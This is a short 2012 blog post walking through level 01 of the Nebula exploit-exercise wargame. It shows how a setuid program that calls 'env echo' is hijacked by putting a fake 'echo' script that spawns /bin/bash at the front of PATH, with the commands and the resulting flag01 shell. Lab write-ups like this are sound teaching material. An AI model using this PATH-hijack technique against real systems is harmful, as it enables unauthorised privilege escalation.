1

Exploit Exersizes Nebula Level 01

By on Feb 06, 2012 in Scripting & Security, Vulnerabilities

Scripting ImageAfter completing Nebula level 00, I’ve finally had time to move to Level 01, and give it some thought.

In level01 you’re given a short code example, and asked to exploit it. After looking at the code for a short period, it was clear that the issue was in the line: 

system("/usr/bin/env echo and now what?");

I’m not a C programmer, so I had to look up the other stuff, but when I realized that echo was not an explicit path, it was clearly simple that it was the exploit.

To exploit this I did the following: 

PATH=~:$PATH

In /home/flag01 I created a script named echo, with the following content:

#!/bin/bash

/bin/bash

Make the script executable with chmod +x, then run /home/flag01/flag01:

level01@nebula:~$ chmod +x echo 
level01@nebula:~$ /home/flag01/flag01 
flag01@nebula:~$ getflag
You have successfully executed getflag on a target account

Now onto Nebula Level02 when I have some time


1 Star2 Stars3 Stars4 Stars5 Stars (No Ratings Yet)
Loading ... Loading ...

About the Author

I am ben kevan.. Well yeah. .that's about it.

Comments (1)

Trackback URL | Comments RSS Feed

  1. Exploit Exersizes Nebula Level 02 | Free Techie Blog says:
    February 6, 2012 at 10:01 pm

    [...] 02 By ben.kevan on Feb 06, 2012 in Scripting & Security, Vulnerabilities After completing Nebula Level 01, I decided to quickly run into Nebula Level 02. After quickly looking at the code they have [...]

Leave a Reply




If you want a picture to show with your comment, go get a Gravatar.